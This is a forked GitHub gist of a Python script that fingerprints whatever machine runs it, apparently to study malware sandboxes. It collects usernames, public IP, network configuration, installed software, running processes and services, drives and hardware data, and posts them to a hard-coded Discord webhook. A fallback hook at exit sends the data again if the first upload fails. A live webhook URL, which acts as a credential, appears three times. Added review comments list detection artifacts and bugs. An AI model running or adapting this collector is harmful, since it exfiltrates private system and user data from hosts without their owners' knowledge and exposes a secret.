@benheise
Forked from Albocoder/sandbox-env-stealer.py
Created February 16, 2022 14:45
The Python code used to take the environment data from sandboxes and send it to a Discord server.
#################################################################################
# #
# Refer to this blog post about what this code is used for: #
# https://albocoder.github.io/malware/2021/06/01/SandboxStudy.html #
# #
#################################################################################
import requests
import os
import psutil
import platform
import subprocess
import socket
from discord_webhook import DiscordWebhook
import getpass
import json
from uuid import getnode as get_mac
from collections import namedtuple
from ctypes import byref, create_unicode_buffer, windll
from ctypes.wintypes import DWORD
from itertools import count
from datetime import datetime
import atexit
import cpuinfo # pip install py-cpuinfo
import time
# Wall-clock start of the run; both report paths include the elapsed time
# measured from this point.
startTime = datetime.now()
##########################################################################################################
# Windows Installer (MSI) API constants, see
# http://msdn.microsoft.com/en-us/library/aa370101(v=VS.85).aspx
UID_BUFFER_SIZE = 39          # sized for a braced product-code GUID plus terminator (per the MSDN page)
PROPERTY_BUFFER_SIZE = 256    # starting size for property lookups; grown on ERROR_MORE_DATA
ERROR_MORE_DATA = 234
ERROR_INVALID_PARAMETER = 87
ERROR_SUCCESS = 0
ERROR_NO_MORE_ITEMS = 259
ERROR_UNKNOWN_PRODUCT = 1605
# Product properties queried for every installed product. Not every product
# defines all of them, so individual lookups may come back empty.
PRODUCT_PROPERTIES = (
    "Language ProductName PackageCode Transforms AssignmentType PackageName "
    "InstalledProductName VersionString RegCompany RegOwner ProductID "
    "ProductIcon InstallLocation InstallSource InstallDate Publisher "
    "LocalPackage HelpLink HelpTelephone URLInfoAbout URLUpdateInfo"
).split()
# Name under which the JSON report is attached to the webhook message.
REPORT_FILENAME = 'report_VMP.json'
# Record type with one field per entry of PRODUCT_PROPERTIES, in that order.
Product = namedtuple('Product', PRODUCT_PROPERTIES)
def get_property_for_product(product, property, buf_size=PROPERTY_BUFFER_SIZE):
    """Return the value of MSI property *property* for *product*, or None.

    Wraps MsiGetProductInfoW. While the API answers ERROR_MORE_DATA the
    buffer is doubled and the call repeated; ERROR_SUCCESS yields the
    buffer contents and any other result code yields None.

    Args:
        product: product-code GUID string as accepted by MsiGetProductInfoW.
        property: name of the property to read (see PRODUCT_PROPERTIES).
        buf_size: initial size of the output buffer in characters.
    """
    while True:
        value_buf = create_unicode_buffer(buf_size)
        needed = DWORD(buf_size)
        rc = windll.msi.MsiGetProductInfoW(product, property, value_buf, byref(needed))
        if rc == ERROR_SUCCESS:
            return value_buf.value
        if rc != ERROR_MORE_DATA:
            return None
        # Buffer too small: retry with twice the capacity.
        buf_size *= 2
def populate_product(uid):
    """Build a Product record for the product code *uid*.

    Every field named in PRODUCT_PROPERTIES is read with
    get_property_for_product, so a field whose lookup fails is None.
    """
    values = (get_property_for_product(uid, name) for name in PRODUCT_PROPERTIES)
    return Product(*values)
def get_installed_products_uids():
    """Return the product-code strings of every product MSI enumerates.

    Calls MsiEnumProductsW with increasing indices until the API reports
    ERROR_NO_MORE_ITEMS. No other result code is inspected: whatever the
    buffer holds after the call is appended.
    """
    uids = []
    index = 0
    while True:
        guid_buf = create_unicode_buffer(UID_BUFFER_SIZE)
        if windll.msi.MsiEnumProductsW(index, guid_buf) == ERROR_NO_MORE_ITEMS:
            break
        uids.append(guid_buf.value)
        index += 1
    return uids
def get_installed_products():
    """Return a Product record for each product code MSI enumerates."""
    return [populate_product(uid) for uid in get_installed_products_uids()]
def is_product_installed_uid(uid):
    """Return True unless MSI reports *uid* as an unknown product.

    Queries the VersionString property through MsiGetProductInfoW. Only the
    ERROR_UNKNOWN_PRODUCT result counts as "not installed"; every other
    result code, including other errors, is reported as installed.
    """
    capacity = 256
    value_buf = create_unicode_buffer(capacity)
    needed = DWORD(capacity)
    rc = windll.msi.MsiGetProductInfoW(
        create_unicode_buffer(uid), u'VersionString', value_buf, byref(needed))
    return rc != ERROR_UNKNOWN_PRODUCT
def report_not_sent():
    """atexit hook: post the collected fingerprint if the main path did not.

    Reads the module-level flag ``report_sent`` (set to True by the main
    block only after its webhook.execute() returned). While it is False this
    rebuilds a reduced result set and posts it to the same hard-coded Discord
    webhook; if that also fails, a one-line failure notice is posted instead.
    """
    if not report_sent:
        try:
            # NOTE(review): the webhook URL is committed to the gist. A Discord
            # webhook URL is a bearer credential -- anyone holding it can post
            # to the channel -- so a published one has to be rotated. For
            # defenders, the discordapp.com webhook path is a usable network
            # indicator of this collector.
            webhook = DiscordWebhook(url='https://discordapp.com/api/webhooks/689228907437621249/Ca3xTRJU_-D6t4WQTSo1JOQM8Z0aPOywQWlzUq4gmdIXRq4rBuaXTBjqodBinxLCbKMU')
            # Public IP as seen by ipify; reused below as "machine_ip".
            outip = requests.get('https://api.ipify.org').text
            results = {
                "platform_system":platform.platform(),
                "platform_name":platform.node(),
                "platform_arch":platform.architecture(),
                "cpu_name":platform.processor(),
                "cpu_info":cpuinfo.get_cpu_info(),
                "num_cores":int(psutil.cpu_count()),
                "actor_pid":os.getpid(),
                "actor_login_username":os.getlogin(),
                # `username` is bound by the main block (after getpass), so if
                # the main block aborted before that point this raises NameError
                # and control goes to the except branch below.
                "actor_username":username,
                "platform_path_env":os.get_exec_path(),
                "actor_working_dir":os.getcwd(),
                # Duplicate key: "machine_ip" is assigned again a few lines
                # down and the later entry wins, but this requests.get() still
                # runs, so ipify is queried twice on this path.
                "machine_ip":requests.get('https://api.ipify.org').text,
                "machine_boot_time":psutil.boot_time(),
                "machine_local_time_epoch":str(time.time()),
                "machine_local_time":str(datetime.now()),
                "machine_ip":outip,
                "machine_cpu_util_ratios":psutil.cpu_times_percent(),
                "machine_cpu_stats":psutil.cpu_stats(),
                "machine_cpu_percent":psutil.cpu_percent(),
                "machine_net_addrs":psutil.net_if_addrs(),
                "machine_disk_partitions":psutil.disk_partitions(),
                "machine_disk_stats":psutil.disk_io_counters(),
                "internet_time":requests.get('http://just-the-time.appspot.com/').text.strip(),
                # Same call as "cpu_info" above; the payload carries it twice.
                "cpuinfo":cpuinfo.get_cpu_info()
            }
            results['script_runtime'] = str(datetime.now() - startTime)
            # The report is serialised to a file in the working directory and
            # re-read as text for the upload. Unlike the main block, this path
            # never deletes the file, so 'nice_sandbox.bro' stays on disk.
            with open('nice_sandbox.bro','w') as fin:
                json.dump(results,fin)
            with open("nice_sandbox.bro", "r") as f:
                webhook.add_file(file=f.read(), filename=REPORT_FILENAME)
            # print(results)
            webhook.execute()
        except:
            # Bare except: any failure above (network, JSON serialisation,
            # NameError, ...) lands here and is reduced to a short notice.
            # Nothing catches exceptions raised in this branch itself.
            webhook = DiscordWebhook(url='https://discordapp.com/api/webhooks/689228907437621249/Ca3xTRJU_-D6t4WQTSo1JOQM8Z0aPOywQWlzUq4gmdIXRq4rBuaXTBjqodBinxLCbKMU')
            webhook.content = "Failed execution for ip: %s (%s)" % (str(requests.get('https://api.ipify.org').text),str(platform.platform()))
            webhook.execute()
##########################################################################################################
# Module-level webhook used by the main path; the atexit fallback creates its
# own instances with the same URL.
# NOTE(review): this URL is a bearer credential committed to a public gist;
# it should be treated as compromised and rotated. Its host/path, the ipify
# and just-the-time.appspot.com lookups, the 'nice_sandbox.bro' file in the
# working directory and the report_VMP.json attachment are the observable
# artifacts of a run, useful for detection.
webhook = DiscordWebhook(url='https://discordapp.com/api/webhooks/689228907437621249/Ca3xTRJU_-D6t4WQTSo1JOQM8Z0aPOywQWlzUq4gmdIXRq4rBuaXTBjqodBinxLCbKMU')
# Flipped to True only after the main path's webhook.execute() returns;
# read by report_not_sent() at interpreter exit.
report_sent = False
if __name__ == '__main__':
    # Registered before any collection starts, so a failure anywhere below
    # still triggers the fallback report at exit.
    atexit.register(report_not_sent)
    if platform.system() == "Windows":
        # Spawns ipconfig/ifconfig as a child process; raw text is kept as-is.
        ip = subprocess.check_output(["ipconfig"],encoding='utf8').strip()
        # pywin32 is imported lazily so non-Windows hosts never need it.
        import win32api
        drives = win32api.GetLogicalDriveStrings()
        # The drive list is NUL-separated with a trailing NUL, hence the split
        # and the dropped empty last element.
        drives = drives.split('\000')[:-1]
        # Full MSI product enumeration via the ctypes helpers above.
        apps=get_installed_products()
    else:
        ip = subprocess.check_output(["ifconfig"],encoding='utf8').strip()
        drives = ["IDK-about-linux"]
        apps = ['IDK-about-linux']
    username = getpass.getuser()
    # Public IP as seen by ipify; reused below as "machine_ip".
    outip = requests.get('https://api.ipify.org').text
    results = {
        "platform_system":platform.platform(),
        "platform_name":platform.node(),
        "platform_arch":platform.architecture(),
        "cpu_name":platform.processor(),
        "cpu_info":cpuinfo.get_cpu_info(),
        "num_cores":int(psutil.cpu_count()),
        "actor_pid":os.getpid(),
        # NOTE(review): os.getlogin() requires a controlling terminal and
        # raises OSError without one; presumably that failure is one of the
        # cases the atexit fallback exists for -- confirm.
        "actor_login_username":os.getlogin(),
        "actor_username":username,
        "actor_working_dir":os.getcwd(),
        "platform_path_env":os.get_exec_path(),
        "installed_sw":apps,
        "platform_ipconfig":str(ip),
        "machine_ip":outip,
        # psutil.cpu_stats() is called four separate times here, so the four
        # counters are not from a single snapshot. "machine_cpu_stats" below
        # carries the same structure again.
        "cpu_stats":list([psutil.cpu_stats().ctx_switches,psutil.cpu_stats().interrupts, psutil.cpu_stats().soft_interrupts, psutil.cpu_stats().syscalls]),
        "machine_cpu_util_ratios":psutil.cpu_times_percent(),
        "machine_cpu_stats":psutil.cpu_stats(),
        "machine_cpu_percent":psutil.cpu_percent(),
        "machine_net_addrs":psutil.net_if_addrs(),
        "machine_disk_partitions":psutil.disk_partitions(),
        "machine_disk_stats":psutil.disk_io_counters(),
        # Indexes the first partition unconditionally; an empty partition
        # list would raise IndexError here.
        "machine_disk0_usage":psutil.disk_usage(psutil.disk_partitions()[0].mountpoint),
        "machine_memory":psutil.virtual_memory(),
        "machine_battery":psutil.sensors_battery(),
        "machine_swap_memory":psutil.swap_memory(),
        # NOTE(review): win_service_iter is Windows-only in psutil, so on the
        # non-Windows branch this entry presumably raises before any report is
        # sent and the atexit fallback takes over -- confirm.
        "running_services":[s.as_dict() for s in psutil.win_service_iter()],
        # as_dict() for every process: the bulk of the payload, and the part
        # whose contents depend on the privileges the script runs with.
        "running_processes":[s.as_dict() for s in psutil.process_iter()],
        "machine_boot_time":psutil.boot_time(),
        "machine_local_time_epoch":str(time.time()),
        "machine_local_time":str(datetime.now()),
        # Plain-HTTP request; the response is stored as returned.
        "internet_time":requests.get('http://just-the-time.appspot.com/').text.strip(),
        "machine_drives":drives,
        # Same call as "cpu_info" above; the payload carries it twice.
        "cpuinfo":cpuinfo.get_cpu_info()
    }
    results['script_runtime'] = str(datetime.now() - startTime)
    # Serialise to a file in the working directory, re-read it as text and
    # attach it under REPORT_FILENAME. json.dump raising here (psutil returns
    # namedtuples, which serialise as lists) would leave the file behind and
    # route to the atexit fallback.
    with open('nice_sandbox.bro','w') as fin:
        json.dump(results,fin)
    with open("nice_sandbox.bro", "r") as f:
        webhook.add_file(file=f.read(), filename=REPORT_FILENAME)
    # print(results)
    webhook.execute()
    # Only reached after a successful POST; suppresses the fallback report.
    report_sent = True
    # The on-disk report is removed only on this success path.
    os.remove('nice_sandbox.bro')